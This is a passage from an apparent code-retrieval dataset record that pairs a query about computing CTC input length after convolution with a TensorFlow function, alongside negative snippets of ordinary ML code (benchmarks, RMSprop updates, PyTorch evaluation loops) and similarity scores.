sys.stderr, 'float32 expected', expected_times_32\r\n print >> sys.stderr, 'float32 % expected/get', (\r\n expected_times_32 / float32_times)\r\n\r\n print >> sys.stderr, 'float64/float32', (\r\n float64_times / float32_times)\r\n print >> sys.stderr, 'expected float64/float32', (\r\n expected_times_64 / float32_times)\r\n\r\n #test in float32 in FAST_RUN mode on the gpu\r\n import theano.sandbox.cuda\r\n if do_gpu:\r\n theano.sandbox.cuda.use('gpu')\r\n gpu_times = do_tests()\r\n print >> sys.stderr, algo_executed\r\n print >> sys.stderr, 'gpu times', gpu_times\r\n print >> sys.stderr, 'gpu expected', expected_times_gpu\r\n print >> sys.stderr, 'gpu % expected/get', (\r\n expected_times_gpu / gpu_times)\r\n\r\n if do_float64:\r\n print >> sys.stderr, 'float64/gpu', float64_times / gpu_times\r\n\r\n if (do_float64 + do_float32 + do_gpu) > 1:\r\n print >> sys.stderr\r\n print >> sys.stderr, 'Duplicate the timing to have everything in one place'\r\n print >> sys.stderr, algo_executed\r\n if do_float64:\r\n print >> sys.stderr, 'float64 times', float64_times\r\n print >> sys.stderr, 'float64 expected', expected_times_64\r\n print >> sys.stderr, 'float64 % expected/get', (\r\n expected_times_64 / float64_times)\r\n if do_float32:\r\n print >> sys.stderr, 'float32 times', float32_times\r\n print >> sys.stderr, 'float32 expected', expected_times_32\r\n print >> sys.stderr, 'float32 % expected/get', (\r\n expected_times_32 / float32_times)\r\n if do_gpu:\r\n print >> sys.stderr, 'gpu times', gpu_times\r\n print >> sys.stderr, 'gpu expected', expected_times_gpu\r\n print >> sys.stderr, 'gpu % expected/get', (\r\n expected_times_gpu / gpu_times)\r\n\r\n if do_float64 and do_float32:\r\n print >> sys.stderr, 'float64/float32', (\r\n float64_times / float32_times)\r\n print >> sys.stderr, 'expected float64/float32', (\r\n expected_times_64 / float32_times)\r\n if do_float64 and do_gpu:\r\n print >> sys.stderr, 'float64/gpu', float64_times / gpu_times\r\n print >> sys.stderr, 'expected float64/gpu', (\r\n expected_times_64 / gpu_times)\r\n if do_float32 and do_gpu:\r\n print >> sys.stderr, 'float32/gpu', float32_times / gpu_times\r\n print >> sys.stderr, 'expected float32/gpu', (\r\n expected_times_32 / gpu_times)\r\n\r\n def compare(x, y):\r\n ratio = x / y\r\n # If there is more then 5% difference between the expected\r\n # time and the real time, we consider this an error.\r\n return sum((ratio < 0.95) + (ratio > 1.05))\r\n\r\n if do_float64:\r\n err = compare(expected_times_64, float64_times)\r\n print >> sys.stderr, 'speed_failure_float64=' + str(err)\r\n if do_float32:\r\n err = compare(expected_times_32, float32_times)\r\n print >> sys.stderr, 'speed_failure_float32=' + str(err)\r\n if do_gpu:\r\n err = compare(expected_times_gpu, gpu_times)\r\n print >> sys.stderr, 'speed_failure_gpu=' + str(err)\r\n\r\n assert not numpy.isnan(gpu_times).any()", "def benchmark_synth_1gpu_gpuparams(self):\n params = self._shared_params()._replace(num_gpus=1)\n self._run_benchmark(params)", "def run_bootstrap_net_correlation_worker(run_parameters, spreadsheet_df, phenotype_df, network_mat,\n spreadsheet_genes_as_input, baseline_array, job_id):\n\n np.random.seed(job_id)\n\n restart_accumulator = np.zeros(network_mat.shape[0])\n gm_accumulator = np.ones(network_mat.shape[0])\n borda_count = np.zeros(network_mat.shape[0])\n\n phenotype_df = phenotype_df.iloc[[job_id], :]\n spreadsheet_df_trimmed, phenotype_df_trimmed, ret_msg = datacln.check_input_value_for_gene_prioritazion(\n spreadsheet_df, phenotype_df)\n\n 
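    # Bootstrap gene prioritization for this phenotype: each iteration samples a
    # fraction of the columns (cols_sampling_fraction), correlates the sampled
    # spreadsheet with the matching permuted phenotype values, keeps the
    # top_beta_of_sort genes, smooths the scores over the network with a random
    # walk with restart, subtracts the baseline, and accumulates a Borda count;
    # the accumulators are averaged over number_of_bootstraps before the output
    # is written.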
sample_smooth = spreadsheet_df_trimmed.as_matrix()\n\n pearson_array = get_correlation(sample_smooth, phenotype_df_trimmed.values[0], run_parameters)\n n_bootstraps = run_parameters[\"number_of_bootstraps\"]\n for bootstrap_number in range(0, n_bootstraps):\n sample_random, sample_permutation = sample_a_matrix_pearson(\n sample_smooth, 1.0, run_parameters[\"cols_sampling_fraction\"])\n\n phenotype_response = phenotype_df_trimmed.values[0, None]\n phenotype_response = phenotype_response[0, sample_permutation]\n pc_array = get_correlation(sample_random, phenotype_response, run_parameters)\n\n pc_array[~np.in1d(spreadsheet_df_trimmed.index, spreadsheet_genes_as_input)] = 0.0\n pc_array = np.abs(trim_to_top_beta(pc_array, run_parameters[\"top_beta_of_sort\"]))\n restart_accumulator[pc_array != 0] += 1.0\n\n pc_array = pc_array / max(sum(pc_array), EPSILON_0)\n pc_array = kn.smooth_matrix_with_rwr(pc_array, network_mat, run_parameters)[0]\n pc_array = pc_array - baseline_array\n\n borda_count = sum_array_ranking_to_borda_count(borda_count, pc_array)\n gm_accumulator = (np.abs(pc_array) + EPSILON_0) * gm_accumulator\n\n restart_accumulator = restart_accumulator / n_bootstraps\n borda_count = borda_count / n_bootstraps\n # pcc_gm_array = gm_accumulator ** (1 / n_bootstraps)\n viz_score = (borda_count - min(borda_count)) / (max(borda_count) - min(borda_count))\n\n phenotype_name = phenotype_df_trimmed.index.values[0]\n gene_name_list = spreadsheet_df_trimmed.index\n gene_orig_list = spreadsheet_genes_as_input\n quantitative_score = borda_count\n generate_net_correlation_output(pearson_array, quantitative_score, viz_score, restart_accumulator,\n phenotype_name, gene_name_list, gene_orig_list, run_parameters)", "def benchmark_synth_1gpu_gpuparams(self):\n params = self._shared_params()._replace(\n num_gpus=1, variable_update='parameter_server')\n self._run_benchmark(params)", "def benchmark_synth_1gpu_gpuparams(self):\n params = self._shared_params()._replace(\n num_gpus=1, variable_update='parameter_server')\n self._run_benchmark(params)", "def benchmark_synth_1gpu_gpuparams(self):\n params = self._shared_params()._replace(\n num_gpus=1, variable_update='parameter_server')\n self._run_benchmark(params)", "def weight_update_rmsprop(self, network):\n epsilon = 10e-8\n gamma = self.gamma\n one_m_gamma = 1.0 - gamma\n\n if self.ms_b is None or self.ms_q is None:\n self.ms_b = []\n self.ms_q = []\n self.ms_rx_inp = []\n self.ms_ry_inp = []\n self.ms_rx_pos_out = []\n self.ms_ry_pos_out = []\n self.ms_rx_neg_out = []\n self.ms_ry_neg_out = []\n for l, layer in enumerate(network.layers):\n self.ms_b.append(np.zeros(layer.b.shape))\n self.ms_q.append(np.zeros(layer.q.shape))\n self.ms_rx_inp.append(np.zeros(layer.input_size))\n self.ms_ry_inp.append(np.zeros(layer.input_size))\n self.ms_rx_pos_out.append(np.zeros(layer.output_size))\n self.ms_ry_pos_out.append(np.zeros(layer.output_size))\n self.ms_rx_neg_out.append(np.zeros(layer.output_size))\n self.ms_ry_neg_out.append(np.zeros(layer.output_size))\n\n for l, layer in enumerate(network.layers):\n self.ms_b[l] = gamma * self.ms_b[l] + one_m_gamma * self.dc_db[l]**2\n self.ms_q[l] = gamma * self.ms_q[l] + one_m_gamma * self.dc_dq[l]**2\n\n self.ms_rx_inp[l] = gamma * self.ms_rx_inp[l] + one_m_gamma * self.dc_drx_inp[l]**2\n self.ms_ry_inp[l] = gamma * self.ms_ry_inp[l] + one_m_gamma * self.dc_dry_inp[l]**2\n\n self.ms_rx_pos_out[l] = gamma * self.ms_rx_pos_out[l] + one_m_gamma * self.dc_drx_pos_out[l]**2\n self.ms_ry_pos_out[l] = gamma * 
self.ms_ry_pos_out[l] + one_m_gamma * self.dc_dry_pos_out[l]**2\n self.ms_rx_neg_out[l] = gamma * self.ms_rx_neg_out[l] + one_m_gamma * self.dc_drx_neg_out[l]**2\n self.ms_ry_neg_out[l] = gamma * self.ms_ry_neg_out[l] + one_m_gamma * self.dc_dry_neg_out[l]**2\n\n layer.b += -self.alpha * self.dc_db[l] / np.sqrt(self.ms_b[l] + epsilon)\n layer.q += -self.alpha * self.dc_dq[l] / np.sqrt(self.ms_q[l] + epsilon)\n\n layer.rx_inp += -self.alpha * self.dc_drx_inp[l] / np.sqrt(self.ms_rx_inp[l] + epsilon)\n layer.ry_inp += -self.alpha * self.dc_dry_inp[l] / np.sqrt(self.ms_ry_inp[l] + epsilon)\n\n layer.rx_pos_out += -self.alpha * self.dc_drx_pos_out[l] / np.sqrt(self.ms_rx_pos_out[l] + epsilon)\n layer.ry_pos_out += -self.alpha * self.dc_dry_pos_out[l] / np.sqrt(self.ms_ry_pos_out[l] + epsilon)\n layer.rx_neg_out += -self.alpha * self.dc_drx_neg_out[l] / np.sqrt(self.ms_rx_neg_out[l] + epsilon)\n layer.ry_neg_out += -self.alpha * self.dc_dry_neg_out[l] / np.sqrt(self.ms_ry_neg_out[l] + epsilon)", "def benchmark_xla_synth_1gpu_gpuparams(self):\n params = self._shared_params()._replace(\n num_gpus=1, variable_update='parameter_server', xla=True)\n self._run_benchmark(params)", "def benchmark_xla_synth_1gpu_gpuparams(self):\n params = self._shared_params()._replace(\n num_gpus=1, variable_update='parameter_server', xla=True)\n self._run_benchmark(params)", "def benchmark_xla_synth_1gpu_gpuparams(self):\n params = self._shared_params()._replace(\n num_gpus=1, variable_update='parameter_server', xla=True)\n self._run_benchmark(params)", "def evaluation(net, n_way, k_query, mdl_file, repnet, imgsz, batchsz):\n\t# we need to test 11788 - 8855 = 2933 images.\n\tdb = Cub('../CUB_200_2011_ZL/', n_way, k_query, train=False, episode_num= 1000//n_way//k_query, imgsz=imgsz)\n\tdb_loader = DataLoader(db, 1, shuffle=True, num_workers=1, pin_memory=True)\n\n\taccs = []\n\tfor batch in db_loader:\n\t\tx = Variable(batch[0]).cuda()\n\t\tx_label = Variable(batch[1]).cuda()\n\t\tatt = Variable(batch[2]).cuda()\n\t\tatt_label = Variable(batch[3]).cuda()\n\n\t\t# prepare for following procedure.\n\t\treal_batchsz = x.size(0)\n\t\tsetsz = x.size(1)\n\n\t\t# [b, setsz, c, h, w] => [b*setsz, c, h, w]\n\t\tx = x.view(real_batchsz * setsz, 3, imgsz, imgsz)\n\t\t# [small batch, c, h, w]\n\t\tx_chunks = torch.chunk(x, batchsz * n_way, dim=0)\n\t\tfeatures = []\n\t\tfor img in x_chunks:\n\t\t\t# [small batch, 512, 1, 1] => [small batch, 512]\n\t\t\tfeature = repnet(img).view(img.size(0), 512)\n\t\t\tfeatures.append(feature)\n\t\t# [b*setsz, 512] => [real batch, setsz, 512]\n\t\tx = torch.cat(features, dim=0).view(real_batchsz, setsz, 512)\n\t\t# detach gradient !!!\n\t\tx = x.detach()\n\n\t\tpred, correct = net(x, x_label, att, att_label, False)\n\t\tcorrect = correct.sum().data[0] # multi-gpu\n\n\t\t# preds = torch.cat(preds, dim= 1)\n\t\tacc = correct / ( x_label.size(0) * x_label.size(1) )\n\t\taccs.append(acc)\n\n\t\t# if np.random.randint(10)<1:\n\t\t# \tprint(pred[0].cpu().data.numpy(), att_label[0].cpu().data.numpy())\n\tprint(accs)\n\n\t# compute the distribution of 600/episodesz episodes acc.\n\tglobal best_accuracy\n\taccuracy = np.array(accs).mean()\n\tprint('<<<<<<<<< %d way accuracy:'%n_way, accuracy, 'best accuracy:', best_accuracy, '>>>>>>>>')\n\n\tif accuracy > best_accuracy:\n\t\tbest_accuracy = accuracy\n\t\ttorch.save(net.state_dict(), mdl_file)\n\t\tprint('Saved to checkpoint:', mdl_file)\n\n\treturn accuracy", "def inference():\n inf_dataset = dataset\n net.eval()\n frames_gen, frame_cnt, rel_props, 
prop_ticks, prop_scaling = inf_dataset[index]\n \n num_crop = args.test_crops\n length = 3\n if args.modality == 'Flow':\n length = 10\n elif args.modality == 'RGBDiff':\n length = 18\n \n # First get the base_out outputs\n base_output = torch.autograd.Variable(torch.zeros((num_crop, frame_cnt, base_out_dim)).cuda(),\n volatile=True)\n cnt = 0\n for frames in frames_gen:\n # frames.shape == [frame_batch_size * num_crops * 3, 224, 224]\n # frame_batch_size is 4 by default\n input_var = torch.autograd.Variable(frames.view(-1, length, frames.size(-2), frames.size(-1)).cuda(),\n volatile=True)\n base_out = net(input_var, None, None, None, None)\n bsc = base_out.view(num_crop, -1, base_out_dim)\n base_output[:, cnt:cnt+bsc.size(1), :] = bsc\n cnt += bsc.size(1)\n\n n_frames = base_output.size(1)\n assert frame_cnt == n_frames\n # GLCU\n step_features = base_output.mean(dim=0).mean(dim=0).unsqueeze(0)\n gate, glcu_task_pred = net.glcu(step_features)\n glcu_task_pred = F.softmax(glcu_task_pred.squeeze(), dim=0).data.cpu().numpy()\n gate = gate.repeat(1, num_crop * n_frames).view(num_crop, n_frames, base_out_dim)\n if net.additive_glcu:\n base_output = base_output + gate\n else:\n base_output = base_output * gate\n\n # output.shape == [num_frames, 7791]\n output = torch.zeros((frame_cnt, output_dim)).cuda()\n cnt = 0\n for i in range(0, frame_cnt, 4):\n base_out = base_output[:, i:i+4, :].contiguous().view(-1, base_out_dim)\n rst = net.test_fc(base_out)\n sc = rst.data.view(num_crop, -1, output_dim).mean(dim=0)\n output[cnt: cnt + sc.size(0), :] = sc\n cnt += sc.size(0)\n base_output = base_output.mean(dim=0).data\n\n # act_scores.shape == [num_proposals, K+1]\n # comp_scores.shape == [num_proposals, K]\n act_scores, comp_scores, reg_scores = reorg_stpp.forward(output, prop_ticks, prop_scaling)\n act_scores = torch.autograd.Variable(act_scores, volatile=True)\n comp_scores = torch.autograd.Variable(comp_scores, volatile=True)\n\n # Task Head\n combined_scores = F.softmax(act_scores[:, 1:], dim=1) * torch.exp(comp_scores)\n combined_scores = combined_scores.mean(dim=0).unsqueeze(0)\n task_pred = F.softmax(net.task_head(combined_scores).squeeze(), dim=0).data.cpu().numpy()\n\n act_scores = act_scores.data\n comp_scores = comp_scores.data\n\n if reg_scores is not None:\n reg_scores = reg_scores.view(-1, num_class, 2)\n reg_scores[:, :, 0] = reg_scores[:, :, 0] * stats[1, 0] + stats[0, 0]\n reg_scores[:, :, 1] = reg_scores[:, :, 1] * stats[1, 1] + stats[0, 1]\n\n torch.cuda.empty_cache() # To empty the cache from previous iterations\n\n # perform stpp on scores\n return ((inf_dataset.video_list[index].id,\n (rel_props.numpy(), act_scores.cpu().numpy(), comp_scores.cpu().numpy(), reg_scores.cpu().numpy(), \n glcu_task_pred, task_pred),\n output.cpu().numpy(),\n base_output.cpu().numpy()))", "def _comput_PSNR(self, input, target):\n shave = 4\n ch, h, w = input.size()\n input_Y = rgb2ycbcrT(input.cpu())\n target_Y = rgb2ycbcrT(target.cpu())\n diff = (input_Y - target_Y).view(1, h, w)\n\n diff = diff[:, shave:(h - shave), shave:(w - shave)]\n mse = diff.pow(2).mean()\n psnr = -10 * np.log10(mse)\n return psnr" ]
[ "0.6702836", "0.60820144", "0.57397383", "0.5513961", "0.5449203", "0.5389235", "0.53726816", "0.5317791", "0.5255269", "0.5254749", "0.5192296", "0.517288", "0.51403135", "0.5121367", "0.51208645", "0.51208645", "0.511794", "0.51084936", "0.5106065", "0.5099034", "0.5092202", "0.5073547", "0.50673836", "0.50488716", "0.50338435", "0.502055", "0.5012428", "0.501089", "0.5002971", "0.49716663", "0.49546856", "0.49401686", "0.49401686", "0.4932358", "0.49209988", "0.49204868", "0.49184752", "0.4916693", "0.49037102", "0.48946956", "0.48838368", "0.48787674", "0.48730496", "0.48694572", "0.48672712", "0.48630452", "0.4860934", "0.48596287", "0.4851591", "0.48455057", "0.48454162", "0.48446012", "0.4840251", "0.48401853", "0.48350665", "0.4833516", "0.48317856", "0.48277622", "0.4827165", "0.48258263", "0.48231295", "0.48189723", "0.48168334", "0.48123232", "0.48073128", "0.47961852", "0.47952184", "0.47950086", "0.47944933", "0.47925803", "0.47901708", "0.47809064", "0.47799984", "0.47758543", "0.4772516", "0.47709933", "0.47695166", "0.47684658", "0.47676653", "0.4765633", "0.4762571", "0.47583732", "0.4757198", "0.47555423", "0.47536805", "0.4739716", "0.47355884", "0.47350612", "0.47327983", "0.4725364", "0.47251174", "0.4724747", "0.4724747", "0.4724747", "0.47242233", "0.47237417", "0.47237417", "0.47237417", "0.47230917", "0.4720603", "0.4719385" ]
0.0
-1
Computes the time_steps/ctc_input_length after convolution.
def compute_length_after_conv(max_time_steps, ctc_time_steps, input_length):
    max_time_steps = tf.cast(max_time_steps, dtype=tf.float32)
    ctc_input_length = tf.cast(
        tf.multiply(input_length, ctc_time_steps), dtype=tf.float32)
    return tf.cast(
        tf.floordiv(ctc_input_length, max_time_steps), dtype=tf.int32)
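A minimal, self-contained usage sketch of the record's compute_length_after_conv function above (an assumption of this sketch, not part of the source record: TensorFlow 2 eager execution, and the illustrative numbers 200 padded frames, true lengths 200/120, and 50 post-convolution steps). It shows the intent of the function: rescaling true input lengths onto the shrunken CTC time axis.

import tensorflow as tf

def compute_length_after_conv(max_time_steps, ctc_time_steps, input_length):
    # Rescale original lengths by the ratio ctc_time_steps / max_time_steps.
    max_time_steps = tf.cast(max_time_steps, dtype=tf.float32)
    ctc_input_length = tf.cast(
        tf.multiply(input_length, ctc_time_steps), dtype=tf.float32)
    return tf.cast(
        tf.floordiv(ctc_input_length, max_time_steps), dtype=tf.int32)

# Hypothetical batch: spectrograms padded to 200 frames, true lengths 200 and 120.
# After the convolutional front end the time axis has 50 steps.
lengths = compute_length_after_conv(
    max_time_steps=200,
    ctc_time_steps=50,
    input_length=tf.constant([200, 120]))
print(lengths.numpy())  # [50 30] -- lengths expressed on the CTC time axis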
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def compute_length_after_conv(max_time_steps, ctc_time_steps, input_length) -> tf.Tensor:\n return tf.to_int32(tf.floordiv(\n tf.to_float(tf.multiply(input_length, ctc_time_steps)), tf.to_float(max_time_steps)))", "def _calc_ctc_input_length(args):\n # py2 needs explicit tf import for keras Lambda layer\n import tensorflow as tf\n\n input_length, input_data, y_pred = args\n max_time_steps = tf.shape(input_data)[1]\n ctc_time_steps = tf.shape(y_pred)[1]\n ctc_input_length = tf.multiply(\n tf.to_float(input_length), tf.to_float(ctc_time_steps))\n ctc_input_length = tf.to_int32(tf.floordiv(\n ctc_input_length, tf.to_float(max_time_steps)))\n return ctc_input_length", "def _cconvolve(x, H, nfft, wlen, axis):\n \n # pad with wlen-1 zeros for overlap & FFT\n x = pad_along_axis(x, [0, wlen - 1], axis=axis)\n xf = np.fft.rfft(x, nfft, axis=axis)\n \n # take product with window in freq. domain\n product = multiply_along_axis(xf, H, axis=axis)\n\n # back transform to sample domain and return\n return np.fft.irfft(product, axis=axis).real", "def compute_conv(in_size, kernel, stride, padding):\n return (in_size + 2 * padding - kernel) // stride + 1", "def convolve(signal, filter):\r\n\r\n # Make the signal and filter the correct size\r\n padded_signal, padded_filter = preprocess(signal, filter) # Constant time\r\n fft_signal = fft(padded_signal) # Log(n) complexity\r\n fft_filter = fft(padded_filter) # Log(n) complexity\r\n filtered_signal = np.multiply(fft_signal, fft_filter) # Element wise multiply (p multiplies)\r\n time_signal = inverse_fft(filtered_signal) # O(N^2)\r\n # Remove excess zeros\r\n time_signal = postprocess(time_signal, signal.size, filter.size) # O(N)\r\n print(\"Done Filtering\")\r\n # return np.convolve(filter, signal) # Replace with your fft implementation\r\n return time_signal", "def calculate_ctc_loss(label_length, ctc_input_length, labels, logits):\n ctc_input_length = tf.to_int32(ctc_input_length)\n sparse_labels = transfer2sparse(label_length, labels)\n return tf.reduce_mean(tf.nn.ctc_loss(labels=sparse_labels, inputs=logits, sequence_length=ctc_input_length))", "def time_conv_layer(model, nb_filters):\n\n model = Conv1D(filters=nb_filters, kernel_size=3, padding='causal', activation='relu')(model)\n model = BatchNormalization()(model)\n return model", "def TCN(input_dim): \r\n # Number of dilations in order to use for the temporal blocks.\r\n dilations = np.array([1, 2, 4, 8, 16, 32])\r\n\r\n input_dim.insert(0,1)\r\n print(f\"input_dim: {input_dim}\")\r\n input_layer = Input(shape=input_dim)\r\n cropping = 0\r\n assert (sum(dilations) * block_size + 1) == 127, \"Paper specifies receptive field size should be 127\"\r\n \r\n prev_layer, skip_layer, _ = add_temporal_block(input_layer, None, 1, 1, cropping)\r\n \r\n for dilation in dilations:\r\n prev_layer, skip_layer, cropping = add_temporal_block(prev_layer, skip_layer, 2, dilation, cropping)\r\n\r\n output_layer = PReLU(shared_axes=[2, 3])(skip_layer)\r\n output_layer = SpectralNormalization(Conv1D(fixed_filters, kernel_size=1))(output_layer)\r\n output_layer = PReLU(shared_axes=[2, 3])(output_layer)\r\n output_layer = SpectralNormalization(Conv1D(1, kernel_size=1))(output_layer)\r\n\r\n return Model(input_layer, output_layer)", "def clConvolution(self, size, mask):", "def test_temporalconv():\n batch_size = 10\n sequence_length = 5\n\n number_of_nodes = 300\n in_channels = 100\n edge_per_node = 15\n out_channels = 10\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n batch, _, _, _ = 
create_mock_batch(\n batch_size,\n sequence_length,\n number_of_nodes,\n edge_per_node,\n in_channels,\n out_channels,\n )\n\n kernel_size = 3\n temporal_conv = TemporalConv(\n in_channels=in_channels, out_channels=out_channels, kernel_size=kernel_size\n ).to(device)\n\n H = temporal_conv(batch.to(device))\n assert H.shape == (\n batch_size,\n sequence_length - (kernel_size - 1),\n number_of_nodes,\n out_channels,\n )", "def call(self, input):\n for r in range(self.tile_num):\n for c in range(self.tile_num):\n # do frequency conv on each tile\n offset = [[r*self.tile_size+self.tile_size/2, c*self.tile_size+self.tile_size/2] for i in range(BATCHSIZE)]\n input_tile = tf.image.extract_glimpse(input, \n [self.tile_size, self.tile_size],\n offset, centered=False, normalized=False) \n pad_pixels = (self.fft_size - self.tile_size) / 2\n input_tile = tf.image.pad_to_bounding_box(\n input_tile, pad_pixels, pad_pixels, self.fft_size, self.fft_size)\n\n input_tile = tf.transpose(input_tile, perm=[0,3,1,2])\n input_fft = tf.spectral.fft2d(tf.cast(input_tile, tf.complex64))\n output_fft = tf.multiply(self.kernel_freq, input_fft[0,:])\n output_fft_accum = tf.reduce_sum(output_fft, 1)\n output_batch_i = tf.spectral.ifft2d(output_fft_accum)\n bias_expand = tf.expand_dims(tf.expand_dims(self.bias, 1),1)\n output_tile_accum = tf.expand_dims(tf.real(output_batch_i) + bias_expand, 0)\n for b in range(1,BATCHSIZE):\n output_fft = tf.multiply(self.kernel_freq, input_fft[b,:])\n output_fft_accum = tf.reduce_sum(output_fft, 1)\n output_fft_batch_i = tf.spectral.ifft2d(output_fft_accum)\n bias_expand = tf.expand_dims(tf.expand_dims(self.bias, 1),1)\n output_tile_accum = tf.concat([output_tile_accum, \n tf.expand_dims(tf.real(output_fft_batch_i) + bias_expand, 0)],0)\n\n # Concat col tiles\n output_accum_col = output_tile_accum\n if c != 0:\n overlap = output_accum_col[:,:,:,-pad_pixels:] + output_tile_accum[:,:,:,0:pad_pixels]\n output_accum_col = tf.concat([output_accum_col[:,:,:,0:-pad_pixels], \n overlap, \n output_tile_accum[:,:,:,pad_pixels:]], \n 3)\n # Concat tow output tiles\n output_accum = output_accum_col\n if r != 0:\n overlap = output_accum[:,:,-pad_pixels:,:] + output_accum_col[:,:,0:pad_pixels,:]\n output_accum = tf.concat([output_accum[:,:,0:-pad_pixels,:], \n overlap, \n output_accum_col[:,:,pad_pixels:,:]], \n 2)\n\n output_accum = tf.transpose(output_accum, perm=[0,2,3,1])\n return tf.image.crop_to_bounding_box(output_accum, 0, 0, self.img_size, self.img_size)", "def time_cnn():\n\n data_dir = \"/home/liyanzeng/git/Var-CNN--DynaFlow/preprocess\"\n\n # read in data from numpy files\n train_metadata = np.load(r\"%s/train_metadata.npy\" % data_dir)\n test_metadata = np.load(r\"%s/test_metadata.npy\" % data_dir)\n train_seq = np.load(r\"%s/train_seq.npy\" % data_dir)\n train_labels = np.load(r\"%s/train_labels.npy\" % data_dir)\n test_seq = np.load(r\"%s/test_seq.npy\" % data_dir)\n test_labels = np.load(r\"%s/test_labels.npy\" % data_dir)\n\n # apply normalization to metadata\n metadata_scaler = StandardScaler()\n train_metadata = metadata_scaler.fit_transform(train_metadata)\n test_metadata = metadata_scaler.transform(test_metadata)\n\n # extract sequences\n train_time, train_time_dleft, train_time_dright, train_dir = np.split(train_seq, 4, axis=2)\n test_time, test_time_dleft, test_time_dright, test_dir = np.split(test_seq, 4, axis=2)\n\n # reshape to be able to normalize\n train_time = np.reshape(train_time, (train_time.shape[0], train_time.shape[1]))\n test_time = np.reshape(test_time, 
(test_time.shape[0], test_time.shape[1]))\n train_time_dleft = np.reshape(train_time_dleft, (train_time_dleft.shape[0], train_time_dleft.shape[1]))\n test_time_dleft = np.reshape(test_time_dleft, (test_time_dleft.shape[0], test_time_dleft.shape[1]))\n train_time_dright = np.reshape(train_time_dright, (train_time_dright.shape[0], train_time_dright.shape[1]))\n test_time_dright = np.reshape(test_time_dright, (test_time_dright.shape[0], test_time_dright.shape[1]))\n\n # apply normalization to packet time data according to scaling computed on train timestamp data\n time_scaler = StandardScaler()\n train_time = time_scaler.fit_transform(train_time)\n test_time = time_scaler.transform(test_time)\n train_time_dleft = time_scaler.transform(train_time_dleft)\n test_time_dleft = time_scaler.transform(test_time_dleft)\n train_time_dright = time_scaler.transform(train_time_dright)\n test_time_dright = time_scaler.transform(test_time_dright)\n\n train_seq = np.stack((train_time, train_time_dleft, train_time_dright), axis=-1)\n test_seq = np.stack((test_time, test_time_dleft, test_time_dright), axis=-1)\n\n # construct CNN\n cnn_input = Input(shape=(seq_length, 3,), name='cnn_input')\n cnn_model = time_conv_block(cnn_input, 2, 4)\n cnn_model = time_conv_block(cnn_model, 2, 8)\n cnn_model = time_conv_block(cnn_model, 2, 8)\n cnn_model = time_conv_block(cnn_model, 3, 16)\n cnn_model = time_conv_block(cnn_model, 3, 16)\n cnn_output = Flatten()(cnn_model)\n cnn_output = dense_layer(cnn_output, 1024, 0.4)\n\n # construct MLP for metadata\n metadata_input = Input(shape=(7,), name='metadata_input')\n metadata_output = dense_layer(metadata_input, 32, 0.) # consider this the embedding of all the metadata\n\n # concatenate before second dense layer\n combined = Concatenate()([cnn_output, metadata_output])\n combined = dense_layer(combined, 1024, 0.5)\n\n # add final softmax layer\n if NUM_UNMON_SITES == 0: # closed-world\n combined_output = Dense(units=NUM_MON_SITES, activation='softmax', name='combined_output')(combined)\n else:\n # add extra class for unmonitored sites\n combined_output = Dense(units=NUM_MON_SITES + 1, activation='softmax', name='combined_output')(combined)\n\n model = Model(inputs=[cnn_input, metadata_input], outputs=[combined_output])\n model.compile(loss='categorical_crossentropy',\n optimizer=Adam(0.001),\n metrics=['accuracy'])\n\n training_data = ({'cnn_input': train_seq,\n 'metadata_input': train_metadata},\n {'combined_output': train_labels})\n\n test_data = ({'cnn_input': test_seq,\n 'metadata_input': test_metadata},\n {'combined_output': test_labels})\n\n lr_modifier = LearningRateScheduler(schedule=lr_scheduler)\n\n # train model\n train_time_start = time.time()\n model.fit(x=training_data[0],\n y=training_data[1],\n batch_size=50,\n epochs=200,\n verbose=0,\n callbacks=[lr_modifier])\n train_time_end = time.time()\n\n # compute final softmax predictions on test set and save predictions\n test_time_start = time.time()\n predictions = model.predict(test_data[0], batch_size=50, verbose=0)\n test_time_end = time.time()\n \n save_dir = \"predictions\"\n np.save(file=r\"%s/time_model\" % save_dir, arr=predictions)\n \n return (train_time_end - train_time_start), (test_time_end - test_time_start)", "def loop_conv(X, W):\n # Go over all five dimensions \n # (#batches x #channels x #height x #width x #dur/length )\n # with filter that has\n # #filters x #channels x #height x #width x #dur/length \n num_filters = W.shape[0]\n filt_channels = W.shape[1]\n filt_height = W.shape[2]\n filt_width 
= W.shape[3]\n filt_duration = W.shape[4]\n num_batches = X.shape[0]\n input_channels = X.shape[1]\n assert(filt_channels == input_channels)\n out_shape = compute_out_shape(X.shape, W.shape)\n out_height = out_shape[2]\n out_width = out_shape[3]\n out_duration = out_shape[4]\n \n # The output is H :)\n H = np.zeros((out_shape))\n for batch_i in xrange(0, num_batches):\n for filt_i in xrange(0, num_filters):\n for out_x in xrange(0, out_height):\n for out_y in xrange(0, out_width):\n for out_z in xrange(0, out_duration):\n for chan_i in xrange(0, filt_channels):\n for filt_x in xrange(0, filt_height):\n for filt_y in xrange(0, filt_width):\n for filt_z in xrange(0, filt_duration):\n weight = W[filt_i, chan_i, filt_x, filt_y, filt_z]\n input_val = X[batch_i, chan_i, \\\n out_x + filt_x, out_y + filt_y, out_z + filt_z]\n H[batch_i, filt_i, out_x, out_y, out_z] += \\\n weight * input_val\n return H", "def build_low_latency_conv(input_frames, input_bins, n_classes=12, dropout=0.5):\n\n from keras.layers import Conv2D, Dense, Dropout, Flatten\n input_shape = (input_frames, input_bins, 1)\n\n # In the paper there are some differences\n # uses log-mel as input instead of MFCC\n # uses 4 in stride for frequency\n # has a linear bottleneck as second layer to reduce multiplications,\n # instead of doing a single full-frequency convolution\n # probably uses ReLu for the DNN layers?\n # probably does not use ReLu for the conv layer?\n\n # Note, in keyword spotting task tstride=2,4,8 performed well also\n model = keras.Sequential([\n Conv2D(186, (input_frames, 8), strides=(1, 1),\n padding='valid', activation='relu', use_bias=True,\n input_shape=input_shape),\n Dropout(dropout),\n Flatten(),\n Dense(128, activation=None, use_bias=True),\n Dropout(dropout),\n Dense(128, activation=None, use_bias=True),\n Dropout(dropout),\n Dense(n_classes, activation='softmax', use_bias=True),\n ])\n model.compile(optimizer='rmsprop', loss='categorical_crossentropy', metrics=['accuracy'])\n return model", "def build(self,\r\n conv_filters=196,\r\n conv_size=13,\r\n conv_strides=4,\r\n act='relu',\r\n rnn_layers=2,\r\n LSTM_units=128,\r\n drop_out=0.8):\r\n i = Input(shape=self.input_size, name='input')\r\n x = Conv1D(conv_filters,\r\n conv_size,\r\n strides=conv_strides,\r\n name='conv1d')(i)\r\n x = BatchNormalization()(x)\r\n x = 